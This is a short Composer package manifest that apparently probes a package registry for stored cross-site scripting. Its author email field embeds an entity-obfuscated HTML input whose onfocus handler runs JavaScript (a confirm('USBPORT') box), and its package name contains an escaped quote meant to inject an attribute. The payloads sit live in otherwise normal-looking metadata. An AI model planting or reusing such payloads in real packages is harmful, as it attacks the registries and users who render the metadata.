{
  "name": "usbportnoy/description-testing\" disabled",
  "description": "press the update button",
  "authors": [
    {
      "name": "Nils Adermann",
      "email": "<input/autofocus=\"\"/onfocus=\"javaSCRIPT&colon;confirm&lpar;'USBPORT'&rpar;\"asas@naderman.de",
      "homepage": "http://www.naderman.de",
      "role": "Developer"
    },
    {
      "name": "Jordi Boggiano",
      "email": "j.boggiano@seld.be",
      "homepage": "https://seld.be",
      "role": "Developer"
    }
  ],
  "require": {
    "erusev/parsedown": "^1.7"
  }
}
